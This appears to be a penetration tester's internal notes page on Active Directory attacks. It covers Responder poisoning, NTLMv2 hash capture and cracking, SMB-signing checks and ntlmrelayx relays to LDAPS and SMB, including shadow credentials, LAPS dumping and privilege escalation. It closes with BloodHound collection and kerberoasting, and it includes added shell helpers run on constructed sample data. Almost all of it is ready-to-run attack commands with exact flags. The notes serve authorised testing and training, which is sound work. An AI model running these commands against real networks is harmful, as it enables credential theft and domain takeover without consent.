There’s a video from November 1, 2022 at https://s1hb-my.sharepoint.com/personal/kickler_blackhillsinfosec_com/_layouts/15/stream.aspx?id=%2Fpersonal%2Fkickler%5Fblackhillsinfosec%5Fcom%2FDocuments%2FRecordings%2FAttempt%20%5F2%5F%20Tech%20Topic%20%2D%20Responder%20%2B%20Relay%20Basics%2D20221101%5F130244%2DMeeting%20Recording%2Emp4&ct=1672945969910&or=Teams-HL&ga=1
Setup
virtual environments for python tooling
apt install python3-virtualenv
virtualenv -p python3 toolenv
source toolenv/bin/activate
deactivate # to exit
identify DCs by name
cat /etc/resolv.conf # the nameservers handed out by DHCP are usually the DCs
dig -x <IP> # reverse lookup of each nameserver IP to get its hostname
dig domain.tld # the domain name itself resolves to an A record for every DC
install responder, run responder
responder -A -I eth0 # analyze mode: log LLMNR/NBT-NS/MDNS requests without poisoning
responder -w -I eth0 # poison and capture hashes, -w also starts the rogue WPAD proxy
responder -wFPv -I eth0 # capture hashes and hijack browsers: -F forces auth on wpad.dat, -P forces proxy auth (can prompt users), -v verbose
crack hashes
- Phil's sort hashes one-liner: one NTLMv2 capture per unique account (Responder logs user::DOMAIN:challenge:response:blob, one line per capture; machine accounts end in $, which the ${i//$/\\$} escape handles for grep; the ^(...):: anchor stops "bob" from also matching "bobby")
cd /opt/Responder/logs && for i in $(cat *-NTLMv2*.txt | cut -d':' -f1 | sort -u); do grep --no-filename -E "^($i|${i//$/\\$})::" *-NTLMv2*.txt | head -n1 ; done
- if creds, skip to bloodhound / getadusers / getuserspns
- else no creds, ntlmrelayx
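The same dedupe as a small shell script, added here as an example and not Phil's one-liner or other material from these notes. Splitting on ':' avoids the regex escaping problem for machine accounts and keys on DOMAIN\user case-insensitively, since NTLM account names are. The five capture lines are constructed (fake CORP domain, fake hex) to show two accounts captured twice.

```shell
#!/bin/sh
# Added example, not Phil's one-liner or other BHIS code: dedupe Responder
# NTLMv2 captures to one line per account before handing them to a cracker.
# Responder's *-NTLMv2*.txt lines look like user::DOMAIN:challenge:response:blob,
# one line per capture, so a chatty host yields the same account many times.
# The captures below are CONSTRUCTED for this example (fake domain, fake hex).
set -eu

dedupe_ntlmv2() {
    # stdin: Responder NTLMv2 log lines; stdout: the first capture seen per account.
    # Splitting on ':' takes the username field literally, so a machine account's
    # trailing '$' (DB-SRV01$) needs no regex escaping and 'bob' cannot swallow 'bobby'.
    # NTLM account names are case-insensitive, hence the toupper() key.
    awk -F':' '{ key = toupper($3 "\\" $1) } !seen[key]++'
}

# Constructed stand-in for: cat /opt/Responder/logs/*-NTLMv2*.txt
SAMPLE='popped.user::CORP:1122334455667788:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:0101000000000000
POPPED.USER::CORP:8877665544332211:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:0101000000000000
DB-SRV01$::CORP:1111222233334444:cccccccccccccccccccccccccccccccc:0101000000000000
svc_backup::CORP:5555666677778888:dddddddddddddddddddddddddddddddd:0101000000000000
DB-SRV01$::CORP:9999000011112222:eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee:0101000000000000'

# Helpers over the constructed sample; in the field just pipe the log files in.
unique_count() { printf '%s\n' "$SAMPLE" | dedupe_ntlmv2 | wc -l | tr -d ' '; }
# Server challenge (field 4) of the line kept for one account, to show first-seen wins.
kept_challenge() { printf '%s\n' "$SAMPLE" | dedupe_ntlmv2 | awk -F':' -v u="$1" '$1 == u { print $4 }'; }

printf '%s\n' "$SAMPLE" | dedupe_ntlmv2
```

Usage in the field: `cat /opt/Responder/logs/*-NTLMv2*.txt | dedupe_ntlmv2> ntlmv2.txt`, then feed that file to hashcat mode 5600. Duplicate captures of one account only waste cracking time, because each capture carries a different server challenge and cracking any one of them yields the same password.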
nmap, check smb services for signing
nmap --script=smb-security-mode.nse -sU -sT -p U:137,T:139,T:445 <scoped-ips> -oA smbtargets # check for smb signing and build targets
crackmapexec smb targets gen
crackmapexec smb 172.16.1.0/24 --gen-relay-list relayTargets.txt
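The same target-list build from the nmap normal output (smbtargets.nmap from -oA) rather than from crackmapexec, added here as an example and not part of these notes or of either tool. Only hosts whose message_signing is not "required" are kept: a relayed session cannot produce a valid SMB signature, so signing-required hosts reject it, while "disabled" and "supported" (enabled but not required) both relay. The scan excerpt is constructed in nmap's layout with fictional hosts.

```shell
#!/bin/sh
# Added example, not BHIS tooling: derive an ntlmrelayx -tf target file from the
# normal-format output of the smb-security-mode scan, the same job that
# crackmapexec --gen-relay-list does from its own scan.
# The scan excerpt below is CONSTRUCTED in nmap layout with fictional hosts.
set -eu

relay_targets_from_nmap() {
    # stdin: nmap normal output (.nmap); stdout: one IP per relayable host.
    awk '
        # "Nmap scan report for dc01.corp.local (10.10.10.10)" or "... for 10.10.10.21"
        /^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip) }
        # smb-security-mode prints one of: disabled (dangerous, but default) / supported / required
        /message_signing:/      { if ($0 !~ /required/) print ip }
    '
}

SAMPLE='Nmap scan report for dc01.corp.local (10.10.10.10)
Host is up (0.00042s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Nmap scan report for 10.10.10.21
Host is up (0.00051s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for fs02.corp.local (10.10.10.22)
Host is up (0.00049s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported'

# Comma-joined result over the constructed sample, for checking.
relay_targets_sample() { printf '%s\n' "$SAMPLE" | relay_targets_from_nmap | tr '\n' ','; }

printf '%s\n' "$SAMPLE" | relay_targets_from_nmap
```

Usage: `relay_targets_from_nmap < smbtargets.nmap > smbtargets.file`, then `-tf smbtargets.file` on ntlmrelayx. The DC drops out here because it requires signing, which is the default for DCs; a victim host also cannot be relayed back to itself, so expect no loot from a target that is also the machine authenticating to you.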
impacket, few different tools here
ldap/ldaps relay with ntlmrelayx
python3 ntlmrelayx.py -6 -t ldaps://dc01 -wh bhis-wpad --add-computer bhis-itops2 --delegate-access -ts -of /opt/work/relays --dump-laps -l /opt/work/loots --escalate-user popped.user | tee -a ldaps-relay.log
did you say wpad poisoning?
if you got some bites on the relay with -wh bhis-wpad, then it is probable that those machines will authenticate to your rogue WPAD host again
- you will have to filter results and responses to determine which machines have accepted your -wh bhis-wpad offer
- the --shadow-target 'object$' flag must reflect the system you are targeting: the machine account whose authentication you relay (a computer can write its own msDS-KeyCredentialLink)
- make sure you |tee -a output for impacket tooling so the relay log can be grepped afterwards
python3 ntlmrelayx.py -6 -wh bhis-wpad -t ldap://10.10.10.10 -smb2support --shadow-credentials --shadow-target 'DB-Srv01$' --no-smb-server --no-validate-privs -l /opt/loot |tee -a /opt/ntlmrelay-out-shadow-creds
- follow the rest of this attack path with standard shadow credentials TTPs
- The PKINITTools section under internal could be used as a basic reference
- Gabriel has some advanced stuff in his archives about this too
smb relay with ntlmrelayx
python3 ntlmrelayx.py -tf smbtargets.file -ts -of /opt/work/relays -l /opt/work/loot -smb2support |tee -a smb-relay.log
Creds?
bloodhound.py — collect data
python3.9 bloodhound.py -c ALL -u 'popped.user' -p 'REDACTED' --domain 'domain.tld' -v --zip -dc 'DC01.domain.tld'
getadusers.py — gather users
- for use with password sprays
getuserspns.py — kerberoast
- grab kerberos hashes
- crack them